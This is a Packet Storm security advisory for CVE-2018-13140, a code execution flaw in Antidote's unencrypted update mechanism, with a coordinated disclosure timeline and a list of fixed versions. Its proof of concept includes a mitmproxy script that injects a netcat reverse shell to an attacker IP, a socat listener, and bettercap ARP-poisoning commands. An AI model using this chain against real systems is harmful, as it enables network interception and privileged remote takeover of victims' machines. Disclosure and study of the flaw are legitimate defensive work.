what you don't know can hurt you

Antidote 9.5.1 Code Execution

Antidote 9.5.1 Code Execution
Posted Sep 21, 2018
Authored by Mickael Karatekin

Antidote versions 9.5.1 and below suffer from an update related code execution vulnerability.

tags | exploit, code execution
advisories | CVE-2018-13140
MD5 | 11230a5ee7403c1821bb1ef377f99a3d

Antidote 9.5.1 Code Execution

Change Mirror Download
# [CVE-2018-13140] Antidote Remote Code Execution against the update
component

## Description

Antidote is a spell checker software for Windows, Linux macOS operating
system.

**Threat**

The application is affected by a remote code execution against the
update component. It leads to code execution with high privileges
against the targeted system.

**Expectation**

Network operations like an update component should be held through
encrypted communication channels like TLS, to prevent all sorts of
hijacking attacks.

## CVSS Score:

**CVE ID**: CVE-2018-13140

**Access Vector**: remote

**Security Risk**: high

**Vulnerability**: CWE-311

**CVSS Base Score**: 8.2

**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:L

# Details

Antidote downloads its installation packages over HTTP protocol, without
any kind of encryption such as TLS.

An attacker can thus perform a Man-In-The-Middle attack to intercept the
update request / response in order to replace or patch the downloaded
package.

Moreover, after the download is done, the component asks for
administrator rights to install the update, allowing thus an attacker to
run the payload as an administrator with privileged rights.


## Proof of Concept

We developed a simple `mitm-proxy` module to exploit this vulnerability,
here the python source code:

```
#(this script works best with --anticache)

from mitmproxy import http

MATCH = "export "
CMD_TO_INJECT = "nc -e /bin/bash IP_OF_ATTACKER 4444&"

class Injector:
def response(self, flow: http.HTTPFlow) -> None:
if MATCH.encode() in flow.response.content:
print("Match detected")
cmd = "\n%s\n%s" % (CMD_TO_INJECT, MATCH)
flow.response.content =
flow.response.content.replace(MATCH.encode(),cmd.encode())

addons = [Injector()]
```

The previous script is looking for the `export ` string for each HTTP
responses, in order to replace it with a simple command to give the
attacker a remote reverse shell. Thereafter, when the update script is
called by the update software component, the simple command is firstly
run as a simple user. The update script asks then user for the
administrator password, allowing our command to be executed as
administrator.

In fact, we could thus obtain two remote shells (as simple user and
administrator), using a multithreaded listening TCP handler:

* The first one when the script is started (user privileges) ;

* The second one after the victim types his credentials (administrator
privileges).

The following commands are used to exploit the vulnerability, using a
Man-In-The-Middle attack:

* a multithreaded `socat` TCP listener, to receive the victim reverse
connection with low privileges against the target:

```
socat - TCP-LISTEN:4444,fork
```

* the mitm-proxy with our dedicated module:

```
mitmproxy -s antidote.py --anticache --listen-port 9090 -m transparent
```

* ARP Cache Poisoning using bettercap and redirecting traffic to mitm-proxy:

```
bettercap -I YOUR_NETWORK_INTERFACE -T VICTIM_IP_ADDRESS --custom-proxy
YOUR_IP_ADDRESS --custom-proxy-port 9090 -S ARP
```

When the Antidote software asks for an update, `mitmproxy` will
automatically patch the update component using our reverse shell payload
included.

After the end of the download, the user will press `install`, leading to
the execution of the two payloads, as described.

## Timeline (dd/mm/yyyy)

Congratulations to Druide for handling this security response very
quickly and professionally:

* 30/04/2018 : Initial discovery.
* 30/04/2018 : Contact acknowledgment.
* 11/05/2018 : Detailed report communicated to Druide.
* 12/05/2018 : Technical response, confirming the vulnerability and
stating which versions are affected (Windows, Linux, but not Mac OS).
* 08/06/2018 : Follow up e-mail from Druide informing about the patching
development status and roadmap.
* 23/06/2018 : Druide informs us of the fixed versions and suggest a
disclosure date on 31/07/2018 to let enough time for customers to patch.
* 21/09/2018 : Disclosure.

## Fixes

* Antidote 9.5.2 (Windows/Linux)
* Antidote 8.5.2 (Windows)
* Antidote HD 6.1.2 (Windows)

## Affected versions

* All Antidote Windows/Linux versions <= 9.5.1
* Mac OS versions are unaffected (already using TLS encryption for updates)

## Credits

* Mickael KARATEKIN <m.karatekin -at- sysdream.com>

--
SYSDREAM Labs <labs@sysdream.com>

GPG :
47D1 E124 C43E F992 2A2E
1551 8EB4 8CD9 D5B2 59A1

* Website: https://sysdream.com/
* Twitter: @sysdream

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

March 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    15 Files
  • 2
    Mar 2nd
    5 Files
  • 3
    Mar 3rd
    3 Files
  • 4
    Mar 4th
    25 Files
  • 5
    Mar 5th
    20 Files
  • 6
    Mar 6th
    16 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    12 Files
  • 9
    Mar 9th
    3 Files
  • 10
    Mar 10th
    4 Files
  • 11
    Mar 11th
    23 Files
  • 12
    Mar 12th
    12 Files
  • 13
    Mar 13th
    12 Files
  • 14
    Mar 14th
    19 Files
  • 15
    Mar 15th
    12 Files
  • 16
    Mar 16th
    3 Files
  • 17
    Mar 17th
    1 Files
  • 18
    Mar 18th
    15 Files
  • 19
    Mar 19th
    22 Files
  • 20
    Mar 20th
    14 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    8 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close